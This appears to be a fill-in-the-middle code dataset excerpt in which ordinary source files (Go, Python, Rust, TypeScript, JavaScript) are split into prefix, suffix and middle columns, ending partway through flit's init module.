file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
archive_ostype.go | // Package ostype is define OS type of SakuraCloud public archive
package ostype
//go:generate stringer -type=ArchiveOSTypes
// ArchiveOSTypes パブリックアーカイブOS種別
type ArchiveOSTypes int
const (
// CentOS OS種別:CentOS
CentOS ArchiveOSTypes = iota
// CentOS6 OS種別:CentOS6
CentOS6
// Ubuntu OS種別:Ubuntu
Ubuntu
// Debian OS種別:Debian
Debian
// CoreOS OS種別:CoreOS
CoreOS
// RancherOS OS種別:RancherOS
RancherOS
// K3OS OS種別: k3OS
K3OS
// Kusanagi OS種別:Kusanagi(CentOS)
Kusanagi
// SophosUTM OS種別:Sophos UTM
SophosUTM
// FreeBSD OS種別:FreeBSD
FreeBSD
// Netwiser OS種別: Netwiser Virtual Edition
Netwiser
// OPNsense OS種別: OPNsense
OPNsense
// Windows2016 OS種別:Windows Server 2016 Datacenter Edition
Windows2016
// Windows2016RDS OS種別:Windows Server 2016 RDS
Windows2016RDS
// Windows2016RDSOffice OS種別:Windows Server 2016 RDS(Office)
Windows2016RDSOffice
// Windows2016SQLServerWeb OS種別:Windows Server 2016 SQLServer(Web)
Windows2016SQLServerWeb
// Windows2016SQLServerStandard OS種別:Windows Server 2016 SQLServer 2016(Standard)
Windows2016SQLServerStandard
// Windows2016SQLServer2017Standard OS種別:Windows Server 2016 SQLServer 2017(Standard)
Windows2016SQLServer2017Standard
// Windows2016SQLServerStandardAll OS種別:Windows Server 2016 SQLServer(Standard) + RDS + Office
Windows2016SQLServerStandardAll
// Windows2016SQLServer2017StandardAll OS種別:Windows Server 2016 SQLServer 2017(Standard) + RDS + Office
Windows2016SQLServer2017StandardAll
// Windows2019 OS種別:Windows Server 2019 Datacenter Edition
Windows2019
// Custom OS種別:カスタム
Custom
)
// OSTypeShortNames OSTypeとして利用できる文字列のリスト
var OSTypeShortNames = []string{
"centos", "centos6", "ubuntu", "debian", "coreos",
"rancheros", "k3os", "kusanagi", "sophos-utm", "freebsd",
"netwiser", "opnsense",
"windows2016", "windows2016-rds", "windows2016-rds-office",
"windows2016-sql-web", "windows2016-sql-standard", "windows2016-sql-standard-all",
"windows2016-sql2017-standard", "windows2016-sql2017-standard-all",
"windows2019",
}
// IsWindows Windowsか
func (o ArchiveOSTypes) IsWindows() bool {
switch o {
case Windows2016, Windows2016RDS, Windows2016RDSOffice,
Windows2016SQLServerWeb, Windows2016SQLServerStandard, Windows2016SQLServerStandardAll,
Windows2016SQLServer2017Standard, Windows2016SQLServer2017StandardAll,
Windows2019:
return true
default:
return false
}
}
// IsSupportDiskEdit ディスクの修正機能をフルサポートしているか(Windowsは一部サポートのためfalseを返す)
func (o ArchiveOSTypes) IsSupportDiskEdit() bool {
switch o {
case CentOS, CentOS6, Ubuntu, Debian, CoreOS, RancherOS, K3OS, Kusanagi, FreeBSD:
return true
default:
return false
}
}
// StrToOSType 文字列からArchiveOSTypesへの変換
func StrToOSType(osType string) ArchiveOSTypes {
switch osType {
case "centos":
return CentOS
case "centos6":
return CentOS6
case "ubuntu":
return Ubuntu
case "debian":
return Debian
case "coreos":
return CoreOS
case "rancheros":
return RancherOS
case "k3os":
ret | urn K3OS
case "kusanagi":
return Kusanagi
case "sophos-utm":
return SophosUTM
case "freebsd":
return FreeBSD
case "netwiser":
return Netwiser
case "opnsense":
return OPNsense
case "windows2016":
return Windows2016
case "windows2016-rds":
return Windows2016RDS
case "windows2016-rds-office":
return Windows2016RDSOffice
case "windows2016-sql-web":
return Windows2016SQLServerWeb
case "windows2016-sql-standard":
return Windows2016SQLServerStandard
case "windows2016-sql2017-standard":
return Windows2016SQLServer2017Standard
case "windows2016-sql-standard-all":
return Windows2016SQLServerStandardAll
case "windows2016-sql2017-standard-all":
return Windows2016SQLServer2017StandardAll
case "windows2019":
return Windows2019
default:
return Custom
}
}
|
|
load_balancer_add_target.go | package cli
import (
"fmt"
"github.com/hetznercloud/hcloud-go/hcloud"
"github.com/spf13/cobra"
)
func newLoadBalancerAddTargetCommand(cli *CLI) *cobra.Command |
func runLoadBalancerAddTarget(cli *CLI, cmd *cobra.Command, args []string) error {
serverIdOrName, _ := cmd.Flags().GetString("server")
idOrName := args[0]
usePrivateIP, _ := cmd.Flags().GetBool("use-private-ip")
loadBalancer, _, err := cli.Client().LoadBalancer.Get(cli.Context, idOrName)
if err != nil {
return err
}
if loadBalancer == nil {
return fmt.Errorf("Load Balancer not found: %s", idOrName)
}
var action *hcloud.Action
if serverIdOrName != "" {
server, _, err := cli.Client().Server.Get(cli.Context, serverIdOrName)
if err != nil {
return err
}
if server == nil {
return fmt.Errorf("server not found: %s", serverIdOrName)
}
action, _, err = cli.Client().LoadBalancer.AddServerTarget(cli.Context, loadBalancer, hcloud.LoadBalancerAddServerTargetOpts{
Server: server,
UsePrivateIP: hcloud.Bool(usePrivateIP),
})
if err != nil {
return err
}
} else {
return fmt.Errorf("specify one of server")
}
if err := cli.ActionProgress(cli.Context, action); err != nil {
return err
}
fmt.Printf("Target added to Load Balancer %d\n", loadBalancer.ID)
return nil
}
| {
cmd := &cobra.Command{
Use: "add-target LOADBALANCER FLAGS",
Short: "Add a target to a Load Balancer",
Args: cobra.ExactArgs(1),
TraverseChildren: true,
DisableFlagsInUseLine: true,
PreRunE: cli.ensureToken,
RunE: cli.wrap(runLoadBalancerAddTarget),
}
cmd.Flags().String("server", "", "Name or ID of the server")
cmd.Flag("server").Annotations = map[string][]string{
cobra.BashCompCustom: {"__hcloud_server_names"},
}
cmd.Flags().Bool("use-private-ip", false, "Determine if the Load Balancer should connect to the target via the network")
return cmd
} |
autofocus_manager.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
from __future__ import absolute_import
from __future__ import print_function
import six.moves.cPickle as pickle
from traits.api import Bool, Any, Instance, Button, Property, Event, on_trait_change
from traitsui.api import View, Item, Handler, HGroup
# ============= standard library imports ========================
# from threading import Thread
from threading import Event as TEvent
from numpy import linspace, argmin, argmax, random, asarray
import time
import os
# ============= local library imports ==========================
from pychron.core.time_series.time_series import smooth
from pychron.image.cv_wrapper import grayspace, crop, get_focus_measure
# from pychron.image.cvwrapper import grayspace, get_focus_measure, crop, resize
from scipy.ndimage.measurements import variance
from scipy.ndimage.filters import generic_gradient_magnitude, sobel
from scipy.ndimage import sum as ndsum
from pychron.paths import paths
from pychron.managers.manager import Manager
from pychron.image.image import Image
# from pychron.machine_vision.focus_parameters import FocusParameters
# from pychron.image.image_editor import ImageEditor
from pychron.graph.graph import Graph
from pychron.mv.focus.focus_parameters import FocusParameters
from pychron.core.ui.image_editor import ImageEditor
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.ui.thread import Thread
class ConfigureHandler(Handler):
def closed(self, info, isok):
if isok:
info.object.dump_parameters()
class AutoFocusManager(Manager):
"""
currently uses passive focus techniques
see
http://en.wikipedia.org/wiki/Autofocus
"""
video = Any
laser_manager = Any
stage_controller = Any
canvas = Any
parameters = Instance(FocusParameters)
configure_button = Button('configure')
autofocus_button = Event
autofocus_label = Property(depends_on='autofocusing')
autofocusing = Bool
# threading event for cancel signal
_evt_autofocusing = None
image = Instance(Image, ())
graph = None
def dump_parameters(self):
p = os.path.join(paths.hidden_dir, 'autofocus_configure')
self.info('dumping parameters to {}'.format(p))
with open(p, 'wb') as f:
pickle.dump(self.parameters, f)
def load_parameter(self):
p = os.path.join(paths.hidden_dir, 'autofocus_configure')
if os.path.isfile(p):
with open(p, 'rb') as f:
try:
params = pickle.load(f)
self.info('loading parameters from {}'.format(p))
if not isinstance(params, FocusParameters):
self.info('out of date parameters file. using default')
params = FocusParameters()
return params
except Exception as e:
print('autofocus load parameter', e)
return FocusParameters()
else:
return FocusParameters()
def passive_focus(self, block=False, **kw):
self._evt_autofocusing = TEvent()
self._evt_autofocusing.clear()
# manager = self.laser_manager
oper = self.parameters.operator
self.info('passive focus. operator = {}'.format(oper))
g = self.graph
if not g:
g = Graph(plotcontainer_dict=dict(padding=10),
window_x=0.70,
window_y=20,
window_width=325,
window_height=325,
window_title='Autofocus'
)
self.graph = g
g.clear()
g.new_plot(padding=[40, 10, 10, 40],
xtitle='Z (mm)',
ytitle='Focus Measure ({})'.format(oper)
)
g.new_series()
g.new_series()
invoke_in_main_thread(self._open_graph)
target = self._passive_focus
self._passive_focus_thread = Thread(name='autofocus', target=target,
args=(self._evt_autofocusing,
),
kwargs=kw
)
self._passive_focus_thread.start()
if block:
# while 1:
# if not self._passive_focus_thread.isRunning():
# break
# time.sleep(0.25)
self._passive_focus_thread.join()
def _open_graph(self):
ui = self.graph.edit_traits()
self.add_window(ui)
def stop_focus(self):
if self.stage_controller:
self.stage_controller.stop()
self.info('autofocusing stopped by user')
def _passive_focus(self, stop_signal, set_zoom=True):
'''
sweep z looking for max focus measure
FMgrad= roberts or sobel (sobel removes noise)
FMvar = intensity variance
'''
self.autofocusing = True
manager = self.laser_manager
fstart = self.parameters.fstart
fend = self.parameters.fend
step_scalar = self.parameters.step_scalar
zoom = self.parameters.zoom
operator = self.parameters.operator
steps = step_scalar * (max(fend, fstart) - min(fend, fstart)) + 1
prev_zoom = None
if set_zoom and \
manager is not None and \
zoom:
motor = manager.get_motor('zoom')
if motor:
prev_zoom = motor.data_position
self.info('setting zoom: {}'.format(zoom))
manager.set_motor('zoom', zoom, block=True)
time.sleep(1.5)
args = self._do_focusing(fstart, fend, steps, operator)
if manager is not None:
if prev_zoom is not None:
self.info('returning to previous zoom: {}'.format(prev_zoom))
manager.set_motor('zoom', prev_zoom, block=True)
if args:
mi, fmi, ma, fma = args
self.info('''passive focus results:Operator={}
ImageGradmin={} (z={})
ImageGradmax={}, (z={})'''.format(operator, mi, fmi, ma, fma))
focus_pos = fma
self.graph.add_vertical_rule(focus_pos)
self.graph.redraw()
# self.graph.add_vertical_rule(fma)
self.info('calculated focus z= {}'.format(focus_pos))
# if set_z:
controller = self.stage_controller
if controller is not None:
if not stop_signal.isSet():
controller.single_axis_move('z', focus_pos, block=True)
controller._z_position = focus_pos
controller.z_progress = focus_pos
self.autofocusing = False
def _cancel_sweep(self, vo):
if self._evt_autofocusing.isSet():
# return to original velocity
self.autofocusing = False
self._reset_velocity(vo)
return True
def _reset_velocity(self, vo):
if self.stage_controller:
pdict = dict(velocity=vo, key='z')
self.stage_controller.set_single_axis_motion_parameters(pdict=pdict)
def _do_focusing(self, start, end, steps, operator):
screen_roi = self._get_roi()
self._add_focus_area_rect(*screen_roi)
src = self._load_source()
src = asarray(src)
h, w, _d = src.shape
cx = w / 2.
cy = h / 2.
cw = self.parameters.crop_width
ch = self.parameters.crop_height
roi = cx, cy, cw, ch
'''
start the z in motion and take pictures as you go
query stage_controller to get current z
'''
self.info('focus sweep start={} end={}'.format(start, end))
# move to start position
controller = self.stage_controller
if controller:
vo = controller.axes['z'].velocity
if self._cancel_sweep(vo):
return
self.graph.set_x_limits(min(start, end), max(start, end), pad=2)
# sweep 1 and velocity 1
self._do_sweep(start, end, velocity=self.parameters.velocity_scalar1)
fms, focussteps = self._collect_focus_measures(operator, roi)
if not (fms and focussteps):
return
# reached end of sweep
# calculate a nominal focal point
args = self._calculate_nominal_focal_point(fms, focussteps)
if not args:
return
nfocal = args[3]
nwin = self.parameters.negative_window
pwin = self.parameters.positive_window
if self._cancel_sweep(vo):
return
nstart, nend = max(0, nfocal - nwin), nfocal + pwin
# mi = min(min(nstart, nend), min(start, end))
# ma = max(max(nstart, nend), max(start, end))
# self.graph.set_x_limits(mi, ma, pad=2)
time.sleep(1)
# do a slow tight sweep around the nominal focal point
self._do_sweep(nstart, nend, velocity=self.parameters.velocity_scalar2)
fms, focussteps = self._collect_focus_measures(operator, roi, series=1)
self._reset_velocity(vo)
else:
focussteps = linspace(0, 10, 11)
fms = -(focussteps - 5) ** 2 + 10 + random.random(11)
self.info('frames analyzed {}'.format(len(fms)))
# self.canvas.markupcontainer.pop('croprect')
return self._calculate_nominal_focal_point(fms, focussteps)
def _do_sweep(self, start, end, velocity=None):
controller = self.stage_controller
controller.single_axis_move('z', start, block=True)
# time.sleep(0.1)
# explicitly check for motion
# controller.block(axis='z')
if velocity:
vo = controller.axes['z'].velocity
controller.set_single_axis_motion_parameters(pdict=dict(velocity=vo * velocity,
key='z'))
self.info('starting sweep from {}'.format(controller.z_progress))
# pause before moving to end
time.sleep(0.25)
controller.single_axis_move('z', end, update=100, immediate=True)
def _collect_focus_measures(self, operator, roi, series=0):
controller = self.stage_controller
focussteps = []
fms = []
if controller.timer:
p = controller.timer.get_interval()
self.debug('controller timer period {}'.format(p))
pz = controller.z_progress
while 1:
src = self._load_source()
x = controller.z_progress
if x != pz:
y = self._calculate_focus_measure(src, operator, roi)
self.graph.add_datum((x, y), series=series)
focussteps.append(x)
fms.append(y)
pz = x
if not (controller.timer.isActive() and \
not self._evt_autofocusing.isSet()):
break
time.sleep(p)
self.debug('sweep finished')
return fms, focussteps
def _calculate_nominal_focal_point(self, fms, focussteps):
if fms:
sfms = smooth(fms)
if sfms is not None:
self.graph.new_series(focussteps, sfms)
self.graph.redraw()
fmi = focussteps[argmin(sfms)]
fma = focussteps[argmax(sfms)]
mi = min(sfms)
ma = max(sfms)
return mi, fmi, ma, fma
def _calculate_focus_measure(self, src, operator, roi):
'''
see
IMPLEMENTATION OF A PASSIVE AUTOMATIC FOCUSING ALGORITHM
FOR DIGITAL STILL CAMERA
DOI 10.1109/30.468047
and
http://cybertron.cg.tu-berlin.de/pdci10/frankencam/#autofocus
'''
# need to resize to 640,480. this is the space the roi is in
# s = resize(grayspace(pychron), 640, 480)
src = grayspace(src)
v = crop(src, *roi)
di = dict(var=lambda x:variance(x),
laplace=lambda x: get_focus_measure(x, 'laplace'),
sobel=lambda x: ndsum(generic_gradient_magnitude(x, sobel, mode='nearest'))
)
func = di[operator]
return func(v)
def image_view(self):
v = View(Item('image', show_label=False, editor=ImageEditor(),
width=640,
height=480,
style='custom'))
return v
def traits_view(self):
v = View(
HGroup(self._button_factory('autofocus_button', 'autofocus_label'),
Item('configure_button', show_label=False),
show_border=True,
label='Autofocus'
)
)
return v
def configure_view(self):
v = View(Item('parameters', style='custom', show_label=False),
handler=ConfigureHandler,
buttons=['OK', 'Cancel'],
kind='livemodal',
title='Configure Autofocus',
x=0.80,
y=0.05
)
return v
def _load_source(self):
src = self.video.get_frame()
return src
# if pychron:
# return Image.new_frame(pychron)
# self.image.load(pychron)
# return self.image.source_frame
def _get_roi(self):
w = self.parameters.crop_width
h = self.parameters.crop_height
cx, cy = self.canvas.get_center_rect_position(w, h)
# cw, ch = self.canvas.outer_bounds
# print w, h, cw, ch
# cx = cw / 2. - w / 2.
# cy = ch / 2. - h / 2.
# cx = (cw - w) / 2.
# cy = (ch - h) / 2.
# cx = (640 * self.canvas.scaling - w) / 2
# cy = (480 * self.canvas.scaling - h) / 2
roi = cx, cy, w, h
return roi
def _add_focus_area_rect(self, cx, cy, w, h):
# pl = self.canvas.padding_left
# pb = self.canvas.padding_bottom
self.canvas.remove_item('croprect')
self.canvas.add_markup_rect(cx, cy, w, h, identifier='croprect')
def _autofocus_button_fired(self):
if not self.autofocusing:
self.autofocusing = True
self.passive_focus()
else:
self.autofocusing = False
self._evt_autofocusing.set()
self.stop_focus()
def _configure_button_fired(self):
self._crop_rect_update()
self.edit_traits(view='configure_view', kind='livemodal')
self.canvas.remove_item('croprect')
# try:
# self.canvas.markupcontainer.pop('croprect')
# except KeyError:
# pass
@on_trait_change('parameters:[_crop_width,_crop_height]')
def _crop_rect_update(self):
roi = self._get_roi()
self._add_focus_area_rect(*roi)
def _get_autofocus_label(self):
|
def _parameters_default(self):
return self.load_parameter()
def _autofocusing_changed(self, new):
if not new:
self.canvas.remove_item('croprect')
# ===============================================================================
# Deprecated
# ===============================================================================
# ============= EOF =====================================
| return 'Autofocus' if not self.autofocusing else 'Stop' |
book-detail.js | import React, { Component } from 'react';
import { connect } from 'react-redux'; |
class BookDetail extends Component {
render() {
if (!this.props.book) {
return <div> Select a book to get Started.</div>;
}
return (
<div>
<h3> Details for: </h3>
<div> {this.props.book.title}</div>
</div>
);
}
}
function mapStateToProps(state) {
return {
book: state.activeBook
};
}
export default connect(mapStateToProps)(BookDetail); | |
bit_pattern.rs | use std::ops::Deref;
#[derive(Copy, Clone, Debug, Default, PartialEq, PartialOrd)]
pub struct StepFloat(f32);
impl Deref for StepFloat {
type Target = f32;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl StepFloat {
pub fn new(val: f32) -> Self {
StepFloat(val)
}
pub fn increment(self) -> Self {
let value = self.0.to_bits();
let mantissa = value & 0b0_00000000_11111111111111111111111;
let incr = if mantissa == 0b0_00000000_11111111111111111111111 {
let mut exponent = value & 0b0_11111111_00000000000000000000000; | exponent <<= 23;
let mut value = value & 0b1_00000000_11111111111111111111111;
value |= exponent;
// reset mantissa
value & 0b1_11111111_00000000000000000000000
} else {
let mut mantissa = value & 0b0_00000000_11111111111111111111111;
mantissa += 1;
let value = value & 0b1_11111111_00000000000000000000000;
value | mantissa
};
Self(f32::from_bits(incr))
}
pub fn decrement(self) -> Self {
let value = self.0.to_bits();
let mantissa = value & 0b0_00000000_11111111111111111111111;
let decr = if mantissa == 0b0_00000000_00000000000000000000000 {
let mut exponent = value & 0b0_11111111_00000000000000000000000;
exponent >>= 23;
exponent -= 1;
exponent <<= 23;
let value = value & 0b1_00000000_11111111111111111111111;
let value = value | exponent;
// set mantissa
value | 0b0_00000000_11111111111111111111111
} else {
let mut mantissa = value & 0b0_00000000_11111111111111111111111;
mantissa -= 1;
let value = value & 0b1_11111111_00000000000000000000000;
value | mantissa
};
Self(f32::from_bits(decr))
}
}
#[cfg(test)]
mod test {
use crate::bit_pattern::StepFloat;
use proptest::prelude::*;
#[test]
fn increments_zero() {
let sf = StepFloat::new(0.0);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(1, value);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(2, value);
}
#[test]
fn increments_one() {
let sf = StepFloat::new(1.0);
let one = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(one, 0b00111111_10000000_00000000_00000000);
let sf = sf.increment();
let value = unsafe { std::mem::transmute::<f32, u32>(sf.0) };
assert_eq!(value, one + 1);
}
#[test]
fn test_incr_decr_noboundary() {
let initial = StepFloat::new(0.1);
let incr = initial.increment();
let original = incr.decrement();
assert_eq!(initial, original);
}
#[test]
fn test_incr_decr_boundary() {
let pattern: u32 = 0b0_00001111_11111111111111111111111;
let initial = StepFloat::new(unsafe { std::mem::transmute(pattern) });
let original = initial.clone().increment().decrement();
assert_eq!(initial, original);
}
proptest! {
#[test]
fn incr_decr_is_noop(p in any::<f32>()) {
let sf = StepFloat::new(p);
assert_eq!(sf, StepFloat::new(p).increment().decrement());
}
#[test]
fn incr_decr_n_times_is_noop(p in any::<f32>(), n in 0usize..1024) {
let mut sf = StepFloat::new(p);
for _ in 0..n {
sf = sf.increment();
}
for _ in 0..n {
sf = sf.decrement();
}
assert_eq!(sf, StepFloat::new(p));
}
}
} | exponent >>= 23;
exponent += 1; |
group.py | class Group:
"""
name: Name of group (String)
deposit: $ Amount required to book the group (Float)
type: Speedball, Recball, Rental (String)
players: ([Object])
paint_bags: list of paint the group has purchased ([Int])
transactions: ([Object])
"""
def __init__(self, name, deposit, type):
self.name = name
self.deposit = deposit
self.type = type
self.players = []
self.paint_bags = []
self.transactions = []
def get_name(self):
return self.name
def get_type(self):
return self.type
def number_of_players(self):
return len(self.players)
def total_spent(self):
total_spent_by_group = 0.0
for transaction in self.transactions:
total_spent_by_group += transaction.amount
return total_spent_by_group
def get_deposit(self):
return self.deposit
def grand_total(self):
return self.total_spent() + self.deposit
def check_if_players_paid(self):
if len(self.players) == 0:
return False
for player in self.players:
if not player.paid:
return False
return True
def number_players_paid(self):
players_who_paid = 0
for player in self.players:
if player.paid:
players_who_paid += 1
return players_who_paid
def total_bags_and_cases(self):
cases = sum(self.paint_bags) // 4
bags = sum(self.paint_bags) % 4
return bags, cases
def | (self):
return self.players
def add_player(self, player):
self.players.append(player)
def get_transactions(self):
return self.transactions
def paint_length(self):
return len(self.paint_bags)
def delete_last_paint(self):
del self.paint_bags[-1]
class Player:
def __init__(self, name):
self.name = name
self.paid = False # 2
self.selected = False # 6
def change_select_status(self):
if not self.selected:
self.selected = True
else:
self.selected = False
def get_name(self):
return self.name
def mark_paid(self):
self.paid = True
def mark_unpaid(self):
self.paid = False
def did_pay(self):
return self.paid
def change_pay_status(self):
if self.paid:
self.paid = False
else:
self.paid = True
def is_selected(self):
return self.selected
def deselect(self):
self.selected = False
class Transaction:
def __init__(self, amount, type):
self.amount = amount
self.type = type
self.selected = False
def change_select_status(self):
if not self.selected:
self.selected = True
else:
self.selected = False
def get_type(self):
return self.type
def get_amount(self):
return self.amount
def is_selected(self):
return self.selected | get_players |
backend.ts | /**
* @file webgl backend
* @author yueshuangyan
*/
import { PaddlejsBackend, env } from '@paddlejs/paddlejs-core';
import type OpExecutor from '@paddlejs/paddlejs-core/src/opFactory/opExecutor';
import { WasmMemoryType } from '@paddlejs/paddlejs-core/commons/interface';
import { RunnerConfig } from './types';
import { download, nchw2chwn, nhwc2chwn, nchw2nhwc, nhwc2nchw } from './utils';
import Wasm from './wasm';
export default class | extends PaddlejsBackend {
wasm: Wasm;
total: number; // 模型总数
cur: number; // 当前模型index
modelConfigList: RunnerConfig[];
modelTimeList: number[];
constructor() {
super();
this.modelConfigList = [];
this.total = -1; // 共注册的模型数目
this.cur = -1; // 当前是哪个模型
env.set('backend', 'wasm');
}
async init() {
// 多个模型并行加载,wasm只初始化一次
await Promise.all([this.initForFirstTime(), this.initSubsequently()]);
}
async initForFirstTime() {
if (!this.wasm) {
const wasm = new Wasm();
this.wasm = wasm;
await wasm.load(WasmMemoryType.memory100);
}
}
async initSubsequently() {
let timer;
return new Promise(resolve => {
timer = setInterval(() => {
if (this.wasm.loaded) {
resolve(true);
clearInterval(timer);
};
}, 10);
});
}
initWasm(modelConfig?: RunnerConfig, weightMap?: OpExecutor[]): number {
this.total++;
const cur = this.total;
modelConfig.index = cur;
this.modelConfigList.push(modelConfig);
const modelInfo = this.genGraphContentStr(weightMap, modelConfig.dataLayout);
this.wasm.init(modelInfo, cur);
return cur;
}
async predict(imageData, index: number) {
if (imageData) {
// 写入imageData
this.wasm.wasmUtil.updateImage(index, imageData);
}
this.cur = index;
// 获取图片数据
this.wasm.runnerModule.run(index);
}
async read(fetchInfo) {
const index = fetchInfo.index;
const curModelConfig = this.modelConfigList[index];
const {
multiOutputs
} = curModelConfig;
let result = [];
if (multiOutputs) {
// 取出data
for (const output of multiOutputs) {
const { name, shape } = output;
const data = this.readOpData(index, name);
const [W = 1, H = 1, C = 1, N = 1] = shape.reverse();
const nchwData = nhwc2nchw(data, [N, H, W, C]);
result.push(nchwData);
}
return result;
}
const { name, shape } = fetchInfo;
result = this.readOpData(index, name);
// convert to nchw
const [W = 1, H = 1, C = 1, N = 1] = shape.reverse();
return nhwc2nchw(result, [N, H, W, C]);
}
readOpData(modelIndex, name) {
const { getDataPtr, __newString, __getArray } = this.wasm.runnerModule;
const ptr = getDataPtr(modelIndex, __newString(name));
const [curPtr, total] = __getArray(ptr);
const data = this.wasm.wasmUtil.readXnn(Float32Array, total, curPtr);
return data;
}
downloadOpData(modelIndex, name) {
const data = this.readOpData(modelIndex, name);
const str = data.join(',');
download(str, str.length);
}
getExecuteTime(ptr) {
const list = new Float32Array(this.wasm.runnerModule.memory.buffer, ptr, 1);
const listLen = list.length;
const timeSum = list.reduce((acc, cur) => acc + cur);
const timeAvg = timeSum / listLen;
const text = document.createElement('div');
text.innerHTML = timeAvg + '';
// document.body.appendChild(text);
}
genGraphContentStr(weightMap, dataLayout) {
const isDataNhwc = dataLayout === 'nhwc';
const tensorOutMap = new Map();
const dataLenList = [];
const result = weightMap.filter(op => {
return op && op.opData && op.opData.tensorData;
}).map(op => {
const tensorData = op.opData.tensorData.map(tensor => {
const { name, tensorName, shape, total } = tensor || {};
const [w = 1, h = 1, c = 1, n = 1] = [...(tensor?.shape || [])].reverse();
let length_unformatted_shape = 4;
let ptr = 0;
if (tensor.data && tensor.data.length && tensorName !== 'image') {
let data = tensor.data = new Float32Array(Array.from(tensor.data, item => Number(item as string)));
dataLenList.push(total);
// 写内存
const opName = op.opData.name;
data = opName === 'conv2d_depthwise' && tensorName === 'filter'
? (isDataNhwc ? nhwc2chwn(data, [n, c, h, w]) : nchw2chwn(data, [n, c, h, w])) as Float32Array
: (isDataNhwc ? data : nchw2nhwc(data, [n, c, h, w])) as Float32Array;
ptr = this.wasm.wasmUtil.write(Float32Array, total, data);
length_unformatted_shape = op.opData.inputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
else if (tensorName === 'out') {
tensorOutMap.set(name, 1);
length_unformatted_shape = op.opData.outputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
else if (tensorOutMap.has(name)) {
length_unformatted_shape = op.opData.inputTensors.filter(
inputTensor => inputTensor.name === tensor.tensorName)[0].unformattedShapeLength;
}
const ptrStr = ptr !== undefined ? `##${ptr}` : '';
const runtime = tensor.runtime || 0;
return `${name}##${shape.join('#$')}##${tensorName}##${total}`
+ `##${length_unformatted_shape}##${runtime}${ptrStr}`;
});
const tensorDataStr = tensorData.join('#@');
const attrs = op.opData.processedAttrs;
const opName = op.opData.name;
if (opName === 'conv2d_depthwise') {
attrs.is_depthwise = 1;
op.opData.name = 'conv2d';
}
const attrsStr = Object.keys(attrs).map(key => {
const item = attrs[key];
const value = item instanceof Array ? item.join('#$') : item;
return `${key}:${value}`;
}).join('##');
return `${op.opData.name}#!${tensorDataStr}#!${attrsStr}`;
});
return ['no#' + result.join('#~'), dataLenList];
}
createProgram() {
// 初始化
}
runProgram() {
}
dispose() {
}
}
| WasmBackend |
models.py | from django.db import models
class Category(models.Model):
name = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Categorias'
class Transactions(models.Model):
| date = models.DateField()
description = models.CharField(max_length=100)
value = models.DecimalField(max_digits=7, decimal_places=2)
observations = models.TextField(null=True, blank=True)
category=models.ForeignKey(Category, on_delete=models.CASCADE)
def __str__(self):
return self.description
class Meta:
verbose_name_plural = 'Transações' |
|
angular-cookies.min.js | /*
AngularJS v1.2.13
(c) 2010-2014 Google, Inc. http://angularjs.org
License: MIT
*/
(function(p,f,n){'use strict';f.module("ngCookies",["ng"]).factory("$cookies",["$rootScope","$browser",function(d,b){var c={},g={},h,k=!1,l=f.copy,m=f.isUndefined;b.addPollFn(function(){var a=b.cookies();h!=a&&(h=a,l(a,g),l(a,c),k&&d.$apply())})();k=!0;d.$watch(function(){var a,e,d;for(a in g)m(c[a])&&b.cookies(a,n);for(a in c)(e=c[a],f.isString(e))?e!==g[a]&&(b.cookies(a,e),d=!0):f.isDefined(g[a])?c[a]=g[a]:delete c[a];if(d)for(a in e=b.cookies(),c)c[a]!==e[a]&&(m(e[a])?delete c[a]:c[a]=e[a])});
| return c}]).factory("$cookieStore",["$cookies",function(d){return{get:function(b){return(b=d[b])?f.fromJson(b):b},put:function(b,c){d[b]=f.toJson(c)},remove:function(b){delete d[b]}}}])})(window,window.angular);
//# sourceMappingURL=angular-cookies.min.js.map |
|
model_show_baremetal_server_interface_attachments_response.go | package model
import (
"encoding/json"
"strings"
)
// Response Object
type ShowBaremetalServerInterfaceAttachmentsResponse struct {
// 裸金属服务器网卡信息列表,详情请参见表2 interfaceAttachments字段数据结构说明。
InterfaceAttachments *[]InterfaceAttachments `json:"interfaceAttachments,omitempty"`
HttpStatusCode int `json:"-"`
}
func (o ShowBaremetalServerInterfaceAttachmentsResponse) String() string {
data, err := json.Marshal(o)
if err != nil {
return "ShowBaremetalServerInterfaceAttachmentsRespo | rfaceAttachmentsResponse", string(data)}, " ")
}
| nse struct{}"
}
return strings.Join([]string{"ShowBaremetalServerInte |
init.py | from collections import OrderedDict
from datetime import date
import json
import os
from pathlib import Path
import re
import sys
import pytoml as toml
def get_data_dir():
"""Get the directory path for flit user data files.
"""
home = os.path.realpath(os.path.expanduser('~'))
if sys.platform == 'darwin':
d = Path(home, 'Library')
elif os.name == 'nt':
appdata = os.environ.get('APPDATA', None)
if appdata:
d = Path(appdata)
else:
d = Path(home, 'AppData', 'Roaming')
else:
# Linux, non-OS X Unix, AIX, etc.
xdg = os.environ.get("XDG_DATA_HOME", None)
d = Path(xdg) if xdg else Path(home, '.local/share')
return d / 'flit'
def get_defaults():
try:
with (get_data_dir() / 'init_defaults.json').open(encoding='utf-8') as f:
return json.load(f)
except FileNotFoundError:
return {}
def store_defaults(d):
data_dir = get_data_dir()
try:
data_dir.mkdir(parents=True)
except FileExistsError:
pass
with (data_dir / 'init_defaults.json').open('w', encoding='utf-8') as f:
json.dump(d, f, indent=2)
license_choices = [
('mit', "MIT - simple and permissive"),
('apache', "Apache - explicitly grants patent rights"),
('gpl3', "GPL - ensures that code based on this is shared with the same terms"),
('skip', "Skip - choose a license later"),
